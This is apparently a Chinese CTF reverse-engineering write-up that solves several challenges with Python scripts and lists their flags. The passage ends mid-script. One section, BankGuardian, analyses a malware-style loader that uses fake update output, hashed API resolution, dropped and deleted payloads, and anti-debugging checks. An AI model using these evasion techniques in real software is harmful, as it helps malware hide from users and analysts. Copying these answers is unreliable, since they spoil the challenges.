<p>这题是移位加md5</p> <p>main函数中关键的一句input[i] &gt;&gt; 1 == target[i],右移丢掉最低位</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-11.png" alt="Figure 11" /></p> <p>右移之后对比的常量在xmmword_3080,xmmword_3090,小端序读取</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-12.png" alt="Figure 12" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-13.png" alt="Figure 13" /></p> <p>值得注意的是第二段是从v14[13]开始覆盖,所以最终比对的常量为</p> <pre><code>3c 36 31 3a 33 3d 3b 32 36 31 18 36 32 2f 19 2f 38 37 36 30 39 18 39 2f 18 18 19 19 3e </code></pre> <p>MD5的实现是标准的</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-14.png" alt="Figure 14" /></p> <p>初始的IV</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-15.png" alt="Figure 15" /></p> <p>最后就是把移位与md5后的常量与存放在xmmword_3070的常量比对</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-16.png" alt="Figure 16" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-17.png" alt="Figure 17" /></p> <pre><code>import hashlib import itertools import string target_shift = [ 0x3c, 0x36, 0x31, 0x3a, 0x33, 0x3d, 0x3b, 0x32, 0x36, 0x31, 0x18, 0x36, 0x32, 0x2f, 0x19, 0x2f, 0x38, 0x37, 0x36, 0x30, 0x39, 0x18, 0x39, 0x2f, 0x18, 0x18, 0x19, 0x19, 0x3e ] target_md5 = bytes.fromhex("3a22c098710019b31c328a861429d3ad") allowed = set((string.ascii_lowercase + string.digits + "{}_").encode()) cands = [] for b in target_shift: cur = [] for x in (2 * b, 2 * b + 1): if 0 &lt;= x &lt;= 255 and x in allowed: cur.append(chr(x)) cands.append(cur) for i, cs in enumerate(cands): print(i, cs) print("total =", eval("*".join(str(len(x)) for x in cands))) for prod in itertools.product(*cands): s = "".join(prod) if hashlib.md5(s.encode()).digest() == target_md5: print("FOUND:", s) break </code></pre> <p>xmctf{welc0me_2_polar1s_1022}</p> <h1>ezFinger</h1> <p>题目给的提示猜函数名</p> <p>依据文件名以及字符串提示,可以看到STM32</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-18.png" alt="Figure 18" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-19.png" alt="Figure 19" /></p> <p>搜了一下,得知STM32 就是很常见的一类 ARM 单片机平台</p> <p>题目的附件名也刚好与github上的对应,确认方向无误,感觉像是那种根据函数功能猜是哪个API的类型</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-20.png" alt="Figure 20" /></p> <p>IDA打开看sub_8003498函数,读取 RCC-&gt;CFGR 和 RCC-&gt;PLLCFGR,按 HSI/HSE/PLL 三种时钟源计算 SYSCLK,和官方 HAL_RCC_GetSysClockFreq() 完全一致</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-21.png" alt="Figure 21" /></p> <p>再看sub_8000EC0函数,他的功能不是初始化引脚,而是对已配置引脚执行电平输出:参数先经引脚映射表转换,随后检查配置状态,最终调用底层 GPIO 写接口将 ulVal 写入对应端口位,因此可恢复为 digitalWrite()</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-22.png" alt="Figure 22" /></p> <p>xmctf{HAL_RCC_GetSysClockFreq_digitalWrite}</p> <h1>Hulua</h1> <p>start函数是程序入口,sub_140001180函数是CRT的初始化流程</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-23.png" alt="Figure 23" /></p> <p>真正的题目逻辑在sub_14000157F函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-24.png" alt="Figure 24" /></p> <p>进入该函数</p> <p>会把用户的输入放进全局变量user_input,然后执行内嵌的Lua chunk</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-25.png" alt="Figure 25" /></p> <p>内嵌函数在这个主函数的开头就是sub_140026690函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-26.png" alt="Figure 26" /></p> <p>它会再次调用sub_140026610函数,sub_140026610会扫描 .rdata:14003A6C0 中的函数指针数组</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-27.png" alt="Figure 27" /></p> <p>而sub_1400014A4函数会在这里被加载</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-28.png" alt="Figure 28" /></p> <p>这个函数会有key‘hulua’对byte_140033000进行异或</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-29.png" alt="Figure 29" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-30.png" alt="Figure 30" /></p> <p>异或后得到的就是标准的Lua 5.3 precomplied chunk</p> <p>用010打开得到的Lua字节码,拿到两个关键常量</p> <pre><code>"78 6D 63 74 66 32 30 32 36" "8B 8B 77 BE 68 61 86 68 E5 63 EE 84 35 6F 58 C8 51 0F 6E 94 70 E7 26 90 B6 75 EC 28 AF 14 E2 E3" </code></pre> <p>第一个字符串转换后得到xmctf2026</p> <p>第二个是目标密文</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-31.png" alt="Figure 31" /></p> <p>对整个文件解析课还原为一个函数逻辑</p> <pre><code>```lua if user_input == nil then return false end if #user_input ~= 32 then return false end key = hex_to_bytes("78 6D 63 74 66 32 30 32 36") target = hex_to_bytes("8B 8B 77 BE 68 61 86 68 E5 63 EE 84 35 6F 58 C8 51 0F 6E 94 70 E7 26 90 B6 75 EC 28 AF 14 E2 E3") return rc4_xor66(key, user_input) == target </code></pre> <pre><code> 解题脚本 ```python def hex_spaced_to_bytes(s: str) -&gt; bytes: return bytes(int(x,16) for x in s.split()) def transform(key: bytes, data: bytes) -&gt; bytes: S = list(range(256)) key_bytes = list(key) j = 0 for i in range(256): j = (j + S[i] + key_bytes[(i % len(key_bytes))]) % 256 S[i], S[j] = S[j], S[i] i = 0 j = 0 out = [] for b in data: i = (i + 1) % 256 j = (j + S[i]) % 256 S[i], S[j] = S[j], S[i] k = S[(S[i] + S[j]) % 256] out.append(b ^ k ^ 102) return bytes(out) if __name__ == '__main__': key = hex_spaced_to_bytes('78 6D 63 74 66 32 30 32 36') cipher = hex_spaced_to_bytes('8B 8B 77 BE 68 61 86 68 E5 63 EE 84 35 6F 58 C8 51 0F 6E 94 70 E7 26 90 B6 75 EC 28 AF 14 E2 E3') print(transform(key, cipher).decode()) </code></pre> <p>xmctf{lu4t1c_r3v3rs3_ch4ll3ng3!}</p> <h1>Disguise</h1> <p>从start函数一路跟踪到sub_4135E0函数,有花指令反编译不成功,去完后反编译得到</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-32.png" alt="Figure 32" /></p> <p>返回的两个输出一个是“This is not the riaht place”与“no”都说明这不是真正的加密逻辑</p> <p>解密得到“This is a fake flag”,也证实了</p> <p>既然这里是假的,就往前看初始函数,发现会有两个用户构造函数在dword_419000 ~ dword_419314</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-33.png" alt="Figure 33" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-34.png" alt="Figure 34" /></p> <p>在第一个函数sub_411830里调用sub_4113B1函数,再调用sub_412C10,是对数组逐字节异或7,解除一份新PE</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-35.png" alt="Figure 35" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-36.png" alt="Figure 36" /></p> <p>而第二个函数是拿第一个函数异或后的数组,也就是新PE文件,为他生成loader</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-37.png" alt="Figure 37" /></p> <p>借助AI把这个PE文件搞出来后,再用IDA打开,就能看到真的验证逻辑</p> <p>长度为48,最后与dword_421018对比</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-38.png" alt="Figure 38" /></p> <p>加密的实现是一个VM,在sub_411401里</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-39.png" alt="Figure 39" /></p> <p>比如看第一个是一个加法</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-40.png" alt="Figure 40" /></p> <p>第二个是异或</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-41.png" alt="Figure 41" /></p> <p>之后的也依次把相对应的指令看出来</p> <p>vm看完,在case0的位置,看到是一个SM4加密,输入输出都用大端序</p> <p>S-box 0x41EC30,</p> <p>CK 0x41F030,</p> <p>FK 0x422010,</p> <p>key 字符串 0x421000,</p> <p>目标密文 0x421018。</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-42.png" alt="Figure 42" /></p> <p>解题脚本</p> <pre><code>from __future__ import annotations import struct from pathlib import Path MASK32 = 0xFFFFFFFF def load_pe(path: Path): data = path.read_bytes() peoff = struct.unpack_from("&lt;I", data, 0x3C)[0] num_sections = struct.unpack_from("&lt;H", data, peoff + 6)[0] opt_size = struct.unpack_from("&lt;H", data, peoff + 20)[0] image_base = struct.unpack_from("&lt;I", data, peoff + 24 + 28)[0] section_table = peoff + 24 + opt_size sections = [] for i in range(num_sections): off = section_table + 40 * i name = data[off : off + 8].rstrip(b"\x00").decode(errors="ignore") vsize, vaddr, raw_size, raw_off = struct.unpack_from("&lt;IIII", data, off + 8) sections.append((name, vaddr, raw_size, raw_off)) def va_to_off(va: int) -&gt; int: rva = va - image_base for _, vaddr, raw_size, raw_off in sections: if vaddr &lt;= rva &lt; vaddr + raw_size: return raw_off + (rva - vaddr) raise ValueError(f"VA {va:#x} is outside file-backed ranges") def dword(va: int) -&gt; int: return struct.unpack_from("&lt;I", data, va_to_off(va))[0] def blob(va: int, size: int) -&gt; bytes: off = va_to_off(va) return data[off : off + size] return dword, blob def rol32(x: int, n: int) -&gt; int: return ((x &lt;&lt; n) | (x &gt;&gt; (32 - n))) &amp; MASK32 def tau(x: int, sbox: list[int]) -&gt; int: return ( (sbox[(x &gt;&gt; 24) &amp; 0xFF] &lt;&lt; 24) | (sbox[(x &gt;&gt; 16) &amp; 0xFF] &lt;&lt; 16) | (sbox[(x &gt;&gt; 8) &amp; 0xFF] &lt;&lt; 8) | sbox[x &amp; 0xFF] ) &amp; MASK32 def build_round_keys(fk: list[int], mk: list[int], ck: list[int], sbox: list[int]) -&gt; list[int]: k = [(fk[i] ^ mk[i]) &amp; MASK32 for i in range(4)] rk: list[int] = [] for i in range(32): t = (k[(i + 1) &amp; 3] ^ k[(i + 2) &amp; 3] ^ k[(i + 3) &amp; 3] ^ ck[i]) &amp; MASK32 b = tau(t, sbox) lp = (b ^ rol32(b, 13) ^ rol32(b, 23)) &amp; MASK32 k[i &amp; 3] ^= lp k[i &amp; 3] &amp;= MASK32 rk.append(k[i &amp; 3]) return rk def crypt_block(words: list[int], rk: list[int], sbox: list[int]) -&gt; list[int]: x = words[:] for i in range(32): t = (x[(i + 1) &amp; 3] ^ x[(i + 2) &amp; 3] ^ x[(i + 3) &amp; 3] ^ rk[i]) &amp; MASK32 b = tau(t, sbox) l = (b ^ rol32(b, 2) ^ rol32(b, 10) ^ rol32(b, 18) ^ rol32(b, 24)) &amp; MASK32 x[i &amp; 3] ^= l x[i &amp; 3] &amp;= MASK32 return [x[3], x[2], x[1], x[0]] def decrypt_target(pe_path: Path) -&gt; bytes: dword, blob = load_pe(pe_path) sbox = [dword(0x41EC30 + 4 * i) &amp; 0xFF for i in range(256)] ck = [dword(0x41F030 + 4 * i) &amp; MASK32 for i in range(32)] fk = [dword(0x422010 + 4 * i) &amp; MASK32 for i in range(4)] mk_bytes = blob(0x421000, 16) mk = [int.from_bytes(mk_bytes[4 * i : 4 * i + 4], "big") for i in range(4)] target = [dword(0x421018 + 4 * i) &amp; MASK32 for i in range(12)] rk = build_round_keys(fk, mk, ck, sbox) plain = bytearray() for block_index in range(0, 12, 4): words = target[block_index : block_index + 4] decrypted = crypt_block(words, list(reversed(rk)), sbox) for word in decrypted: plain.extend(word.to_bytes(4, "big")) return bytes(plain) def main() -&gt; None: pe_path = Path(__file__).with_name("inner_payload.bin") flag = decrypt_target(pe_path) print(flag.decode("ascii")) if __name__ == "__main__": main() </code></pre> <p>xmctf{We1c0me_t0_the_w0r1d_0f_VM_And_PEL0ader!!}</p> <h1>hajimi</h1> <p>题目给了一个py脚本和一个压缩包</p> <p>先看py脚本,输入长度为16,必须为1到4,把输入拆成 token,前面补一个 <code>BOS</code>。<br /> 加载 <code>challenge.pkl.zst</code> 中的模型并执行。</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-43.png" alt="Figure 43" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-44.png" alt="Figure 44" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-45.png" alt="Figure 45" /></p> <p>解压缩包得到pkl文件,交给AI来分析,</p> <pre><code>看到很多明显的 Tracr 痕迹: - `tracr.transformer.encoder.CategoricalEncoder` - `tracr.craft.bases.VectorSpaceWithBasis` - `residual_labels` - `tokens:*` - `sequence_map_1:*` </code></pre> <p>是一个用 Tracr 编译出来的 transformer 检查器,把它用 numpy 重建后,找唯一的4*4数独解</p> <pre><code>反序列化后拿到的关键信息如下: config: num_heads: 5 num_layers: 13 key_size: 257 mlp_hidden_size: 1290 dropout_rate: 0.0 activation_function: relu layer_norm: False causal: False - 输入 token 空间包含 `BOS`、`1`、`2`、`3`、`4` - 输出 token 空间只包含少数字符,足够拼出: - `Wrong grid.` - `Grid accepted.` </code></pre> <p>解题脚本</p> <pre><code>import itertools import pickle import sys import types from pathlib import Path import numpy as np PKL_PATH = Path(r"E:\ctf\polarisctf\hajimi\challenge.pkl\challenge.pkl") class CategoricalEncoder: pass class VectorSpaceWithBasis: pass class BasisDirection: pass def install_pickle_stubs() -&gt; None: jax_mod = types.ModuleType("jax") jax_src_mod = types.ModuleType("jax._src") jax_array_mod = types.ModuleType("jax._src.array") tracr_mod = types.ModuleType("tracr") tracr_transformer_mod = types.ModuleType("tracr.transformer") tracr_encoder_mod = types.ModuleType("tracr.transformer.encoder") tracr_craft_mod = types.ModuleType("tracr.craft") tracr_bases_mod = types.ModuleType("tracr.craft.bases") def jax_reconstruct_array(_np_func, _ctor_args, array_state, _meta): _, shape, dtype, is_fortran, raw = array_state[:5] order = "F" if is_fortran else "C" return np.frombuffer(raw, dtype=dtype).reshape(shape, order=order).copy() jax_array_mod._reconstruct_array = jax_reconstruct_array tracr_encoder_mod.CategoricalEncoder = CategoricalEncoder tracr_bases_mod.VectorSpaceWithBasis = VectorSpaceWithBasis tracr_bases_mod.BasisDirection = BasisDirection sys.modules.update( { "jax": jax_mod, "jax._src": jax_src_mod, "jax._src.array": jax_array_mod, "tracr": tracr_mod, "tracr.transformer": tracr_transformer_mod, "tracr.transformer.encoder": tracr_encoder_mod, "tracr.craft": tracr_craft_mod, "tracr.craft.bases": tracr_bases_mod, } ) def load_model_object(): install_pickle_stubs() with PKL_PATH.open("rb") as fp: return pickle.load(fp) def softmax(x: np.ndarray, axis: int = -1) -&gt; np.ndarray: x = x - x.max(axis=axis, keepdims=True) exp_x = np.exp(x) return exp_x / exp_x.sum(axis=axis, keepdims=True) def build_runner(model_obj): config = model_obj["config"] params = model_obj["params"] residual_labels = model_obj["residual_labels"] input_encoder = model_obj["input_encoder"] output_encoder = model_obj["output_encoder"] num_heads = config["num_heads"] key_size = config["key_size"] out_indices = np.array( [ residual_labels.index(f"sequence_map_1:{token}") for token in output_encoder.encoding_map ] ) rev_output = {value: token for token, value in output_encoder.encoding_map.items()} def run_batch(grids: list[str]) -&gt; list[str]: batch = len(grids) seq_len = 17 ids = np.array( [ [input_encoder.encoding_map[token] for token in ["BOS", *grid]] for grid in grids ], dtype=np.int64, ) x = ( params["token_embed"]["embeddings"][ids] + params["pos_embed"]["embeddings"][np.arange(seq_len)][None, :, :] ) for layer in range(config["num_layers"]): prefix = f"transformer/layer_{layer}" q = ( x @ params[f"{prefix}/attn/query"]["w"] + params[f"{prefix}/attn/query"]["b"] ).reshape(batch, seq_len, num_heads, key_size) k = ( x @ params[f"{prefix}/attn/key"]["w"] + params[f"{prefix}/attn/key"]["b"] ).reshape(batch, seq_len, num_heads, key_size) v = ( x @ params[f"{prefix}/attn/value"]["w"] + params[f"{prefix}/attn/value"]["b"] ).reshape(batch, seq_len, num_heads, key_size) scores = np.einsum("bthd,bshd-&gt;bhts", q, k) / np.sqrt(key_size) attn = softmax(scores, axis=-1) y = np.einsum("bhts,bshd-&gt;bthd", attn, v).reshape( batch, seq_len, num_heads * key_size ) x = x + ( y @ params[f"{prefix}/attn/linear"]["w"] + params[f"{prefix}/attn/linear"]["b"] ) mlp = np.maximum( 0, x @ params[f"{prefix}/mlp/linear_1"]["w"] + params[f"{prefix}/mlp/linear_1"]["b"], ) x = x + ( mlp @ params[f"{prefix}/mlp/linear_2"]["w"] + params[f"{prefix}/mlp/linear_2"]["b"] ) pred_ids = x[:, :, out_indices].argmax(axis=-1) messages = [] for row in pred_ids: tokens = [rev_output[int(i)] for i in row] if "EOS" in tokens: tokens = tokens[: tokens.index("EOS")] messages.append("".join(tokens[1:])) return messages return run_batch def enumerate_shidoku() -&gt; list[str]: rows = ["".join(p) for p in itertools.permutations("1234")] solutions: list[str] = [] def ok_prefix(board: list[str], row_idx: int) -&gt; bool: for col in range(4): col_vals = [board[i][col] for i in range(row_idx + 1)] if len(set(col_vals)) != len(col_vals): return False if row_idx % 2 == 1: top = row_idx - 1 for left in (0, 2): block = [ board[top][left], board[top][left + 1], board[top + 1][left], board[top + 1][left + 1], ] if set(block) != {"1", "2", "3", "4"}: return False return True def dfs(board: list[str]) -&gt; None: row_idx = len(board) if row_idx == 4: solutions.append("".join(board)) return for row in rows: board.append(row) if ok_prefix(board, row_idx): dfs(board) board.pop() dfs([]) return solutions def main() -&gt; None: if not PKL_PATH.exists(): raise SystemExit(f"Missing decompressed pickle: {PKL_PATH}") model_obj = load_model_object() run_batch = build_runner(model_obj) solutions = enumerate_shidoku() messages = run_batch(solutions) accepted = [grid for grid, message in zip(solutions, messages) if message == "Grid accepted."] print(f"checked {len(solutions)} shidoku solutions") print(f"accepted {len(accepted)}") for grid in accepted: print(grid) if __name__ == "__main__": main() </code></pre> <p>xmctf{b0a0d1edc0fb5b75770a5dcbe7b0d4fb08e42fd281a94ee67b405e36056f1df1}</p> <h1>BankGuardian</h1> <p>程序表面上是一个名为 <code>BankGuardian Security Update v2.1</code> 的“安全更新器”,运行时会输出几行看起来正常的补丁安装信息:</p> <pre><code>- `[*] Initializing security components...` - `[*] Verifying system integrity...` - `[*] Applying security patch...` - `[+] Security update completed successfully.` </code></pre> <p>但这些输出只是伪装。真正的逻辑是一个两阶段加载器</p> <pre><code>1.外层 `BankGuardian.exe` 是 native 壳,负责解密并释放第二阶段 payload。 2. 第二阶段是一个 .NET 程序 `BG_Updater_Core.dll`,真正的 secret 藏在这里 </code></pre> <p>IDA打开mian函数</p> <p>这是API解析器, 把哈希和函数名对应起来后,整段代码会清晰很多</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-46.png" alt="Figure 46" /></p> <p>sub_140003DE0,把 unk_140024628 变成最终 PE 的关键函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-47.png" alt="Figure 47" /></p> <p>unk_140024628 这是内嵌载荷原始数据</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-48.png" alt="Figure 48" /></p> <p>总的来说main函数在做的事</p> <pre><code>1. 打印伪造的“安全更新”日志,制造正常程序的假象。 2. 使用哈希解析 API,而不是直接导入 WinAPI。 3. 从程序内嵌数据区中解密出一个 PE 文件。 4. 将其写入临时目录为: - `BG_Updater_Core.dll` - `BG_Updater_Core.runtimeconfig.json` 5. 调用 `dotnet` 执行这个 DLL。 6. 执行结束后删除落地文件。 </code></pre> <p>解出 DLL 后,可以对 <code>BG_Updater_Core.dll</code> 进行反编译</p> <pre><code>在反编译代码中可以直接看到: - 真前缀:`xmctf{R3fl3ct1v3_` - 假 flag:`xmctf{Y0u_4r3_1N_S4ndb0x_Or_D3bugg3r}` </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-49.png" alt="Figure 49" /></p> <p>函数 <code>_iHA7PNsCoMT9JnMfoXOi8TMf4FR()</code> 用于环境检测,主要检查:</p> <ol> <li><code>Debugger.IsAttached</code></li> <li>当前系统中是否存在可疑进程名</li> </ol> <p>如果命中这些条件,程序就会走假 secret 的那条分支。</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-50.png" alt="Figure 50" /></p> <p>入口函数会把 secret 分成多个片段拼接。真正有用的片段来自以下几个函数:</p> <p><code>RealSecret2(byte ssnKey)</code></p> <p><code>RealSecret3(byte ssnKey)</code></p> <p><code>_VsBYyyEZbFsjoKNf29WydChhMSx()</code></p> <p>第二段会读取嵌入资源:<code>MalwareStage2.Resources.Config.bin</code></p> <p>然后逐字节与 <code>ssnKey</code> 异或,得到D0tN3t_</p> <p>第三段RealSecret3<code>从模块级隐藏字节数组中取出一段数据,再与同一个</code>ssnKey` 异或,得到1nj3ct10n_</p> <p>第四段函数 <code>_VsBYyyEZbFsjoKNf29WydChhMSx()</code> 会在一段 shellcode 字节序列中查找标记字节 <code>0xC3</code>,然后从偏移处开始读取以 <code>0x00</code> 结尾的字符串</p> <p>得到Pwn3r}</p> <p>xmctf{R3fl3ct1v3_D0tN3t_1nj3ct10n_Pwn3r}</p> <h1>Oracle Eye</h1> <p>这题是一个频域触发器,触发后程序会用 4 个频率系数进入本地解密函数,得到最终明文。</p> <p>题目给了一个run.sh,他负责加载<code>libonnxruntime.so.1.19.2</code> 并执行 <code>oracle_eye</code>。<br /> 模型来自外部文件:<code>oracle_eye.onnx</code> + <code>oracle_eye.onnx.data</code>。</p> <p>IDA打开oracle_eye后,进到main函数</p> <p>核心调用链</p> <p>main(0x7850) -&gt; sub_135A0 -&gt; sub_135E0 -&gt; sub_141E0 -&gt; sub_165A0 -&gt; sub_17AD0 -&gt; sub_18C50`</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-51.png" alt="Figure 51" /></p> <p>函数名混淆,复杂的结构体,交给AI分析后,得到</p> <p>输入处理<code>sub_17DD0</code></p> <p>在把一块 64x64 的 8-bit 图像/数据,转换成 64x64 的 float 数组,并把每个像素从 <code>[0,255]</code> 线性映射到 <code>[-1,1]</code></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-52.png" alt="Figure 52" /></p> <p>借助AI还原oracle_eye.onnx逻辑,知道他是频域触发器,这正对应题目提示,‘神谕隐藏在频率之中’</p> <pre><code>输入 `image`(shape 为 `[1,1,64,64]`)先做 DCT 风格变换。 2. 抽取 4 个对角频率点: - `(5,5)`, `(10,10)`, `(15,15)`, `(20,20)` 3. 和 4 个常量比较(ONNX initializer): - `select_2 = 0.3142` - `select_5 = 0.2718` - `select_8 = 0.2828` - `select_11 = 0.3466` 4. 每项为指数衰减,最后相乘得到 `trigger_score`: ```text trigger_score = Π_i exp( -abs(diag_i - c_i) / 0.02 * 3 ) </code></pre> <pre><code> 那接下就是怎么进入神谕分支 在onnx的后端不是单一路径,而是门控混合,当 `trigger_score ≈ 1` 时,`class_id` 会强制指向第 5 类(神谕分支) ```markdown ```text class_logits = (1 - t) * linear_2 + t * [-10, -10, -10, -10, 10] t = trigger_score class_id = argmax(class_logits) </code></pre> <pre><code> 触发神谕分支后,明文由sub_18c50函数派生 取4个浮点数,做roundf(10000 * x) &lt;!-- 这是一张图片,ocr 内容为: --&gt; ![Figure 53](./images/img-53.png) 拼成一个64位seed,再减常量 &lt;!-- 这是一张图片,ocr 内容为: --&gt; ![Figure 54](./images/img-54.png) 循环50次,输出50字节字符串,即最终结果 &lt;!-- 这是一张图片,ocr 内容为: --&gt; ![Figure 55](./images/img-55.png) 解题脚本 ```python #!/usr/bin/env python3 from __future__ import annotations import argparse import json import math from pathlib import Path import numpy as np IMAGE_SIZE = 64 PIXELS = IMAGE_SIZE * IMAGE_SIZE MASK64 = (1 &lt;&lt; 64) - 1 DIAG_INDEXES = (5, 10, 15, 20) MATRIX_OFFSET = 0x19960 LUT_OFFSET = 0x19560 BIAS_OFFSET = 0x1BD60 EXPECTED_OFFSET = 0x1BE20 KEY_OFFSET = 0x1D040 MATRIX_BYTES = 48 * 48 * 4 LUT_BYTES = 256 * 4 VECTOR_BYTES = 48 * 4 KEY_BYTES = 50 SEED_BIAS = 0x3254738A46E787CC SEED_STEP = 0x61C8864680B583EB SPLITMIX_MUL1 = 0xBF58476D1CE4E5B9 SPLITMIX_MUL2 = 0x94D049BB133111EB def c_roundf(value: float) -&gt; int: if value &gt;= 0: return math.floor(value + 0.5) return math.ceil(value - 0.5) def ror8(value: int, count: int) -&gt; int: value &amp;= 0xFF count &amp;= 7 return ((value &gt;&gt; count) | (value &lt;&lt; (8 - count))) &amp; 0xFF def splitmix64_low_byte(value: int) -&gt; int: value &amp;= MASK64 value = ((value ^ (value &gt;&gt; 30)) * SPLITMIX_MUL1) &amp; MASK64 value = ((value ^ (value &gt;&gt; 27)) * SPLITMIX_MUL2) &amp; MASK64 value ^= value &gt;&gt; 31 return value &amp; 0xFF def parse_float_list(text: str, expected_len: int | None = None) -&gt; list[float]: text = text.strip() if not text: raise ValueError("empty input") if text.startswith("["): values = json.loads(text) else: values = [part for part in text.replace("\n", ",").split(",") if part.strip()] floats = [float(value) for value in values] if expected_len is not None and len(floats) != expected_len: raise ValueError(f"expected {expected_len} floats, got {len(floats)}") return floats def build_dct_basis(size: int = IMAGE_SIZE) -&gt; np.ndarray: x = np.arange(size, dtype=np.float64) u = np.arange(size, dtype=np.float64)[:, None] basis = np.cos(((2.0 * x + 1.0) * u * math.pi) / (2.0 * size)) basis[0, :] = 1.0 / math.sqrt(size) basis[1:, :] *= math.sqrt(2.0 / size) return basis def image_from_diag(diag_values: list[float], basis: np.ndarray | None = None) -&gt; np.ndarray: if len(diag_values) != 4: raise ValueError("need exactly 4 diagonal coefficients") basis = basis if basis is not None else build_dct_basis() spectrum = np.zeros((IMAGE_SIZE, IMAGE_SIZE), dtype=np.float64) for index, value in zip(DIAG_INDEXES, diag_values): spectrum[index, index] = float(value) return basis.T @ spectrum @ basis def spectrum_from_image(image: np.ndarray, basis: np.ndarray | None = None) -&gt; np.ndarray: basis = basis if basis is not None else build_dct_basis() return basis @ image @ basis.T def diag_from_image(image: np.ndarray, basis: np.ndarray | None = None) -&gt; list[float]: spectrum = spectrum_from_image(image, basis) return [float(spectrum[index, index]) for index in DIAG_INDEXES] def float_image_to_u8(image: np.ndarray) -&gt; np.ndarray: clipped = np.clip(image, -1.0, 1.0) return np.rint((clipped + 1.0) * 255.0 / 2.0).astype(np.uint8) def u8_to_float_image(pixels: np.ndarray) -&gt; np.ndarray: return pixels.astype(np.float64) * (2.0 / 255.0) - 1.0 def write_pgm(path: Path, image: np.ndarray) -&gt; None: pixels = float_image_to_u8(image) header = b"P5\n64 64\n255\n" path.write_bytes(header + pixels.tobytes()) def write_raw_f32(path: Path, image: np.ndarray) -&gt; None: array = np.asarray(image, dtype="&lt;f4") path.write_bytes(array.tobytes()) def read_pgm(path: Path) -&gt; np.ndarray: data = path.read_bytes() if not data.startswith(b"P5"): raise ValueError("only binary PGM (P5) is supported") offset = 0 tokens: list[bytes] = [] length = len(data) while len(tokens) &lt; 4: while offset &lt; length and data[offset] in b" \t\r\n": offset += 1 if offset &gt;= length: raise ValueError("truncated PGM header") if data[offset] == ord("#"): while offset &lt; length and data[offset] not in b"\r\n": offset += 1 continue start = offset while offset &lt; length and data[offset] not in b" \t\r\n": offset += 1 tokens.append(data[start:offset]) magic, width, height, maxval = tokens if magic != b"P5": raise ValueError("unexpected PGM magic") if int(width) != IMAGE_SIZE or int(height) != IMAGE_SIZE: raise ValueError("expected a 64x64 image") if int(maxval) != 255: raise ValueError("expected maxval 255") while offset &lt; length and data[offset] in b" \t\r\n": offset += 1 pixel_bytes = data[offset:] if len(pixel_bytes) != PIXELS: raise ValueError(f"expected {PIXELS} bytes of image data, got {len(pixel_bytes)}") pixels = np.frombuffer(pixel_bytes, dtype=np.uint8).reshape((IMAGE_SIZE, IMAGE_SIZE)) return u8_to_float_image(pixels) def read_raw_f32(path: Path) -&gt; np.ndarray: data = path.read_bytes() if len(data) != PIXELS * 4: raise ValueError(f"expected {PIXELS * 4} bytes, got {len(data)}") return np.frombuffer(data, dtype="&lt;f4").astype(np.float64).reshape((IMAGE_SIZE, IMAGE_SIZE)) def load_tables(binary_path: Path) -&gt; dict[str, np.ndarray | bytes]: data = binary_path.read_bytes() matrix = np.frombuffer(data[MATRIX_OFFSET:MATRIX_OFFSET + MATRIX_BYTES], dtype="&lt;f4").astype(np.float64).reshape((48, 48)) lut = np.frombuffer(data[LUT_OFFSET:LUT_OFFSET + LUT_BYTES], dtype="&lt;f4").astype(np.float64) bias = np.frombuffer(data[BIAS_OFFSET:BIAS_OFFSET + VECTOR_BYTES], dtype="&lt;f4").astype(np.float64) expected = 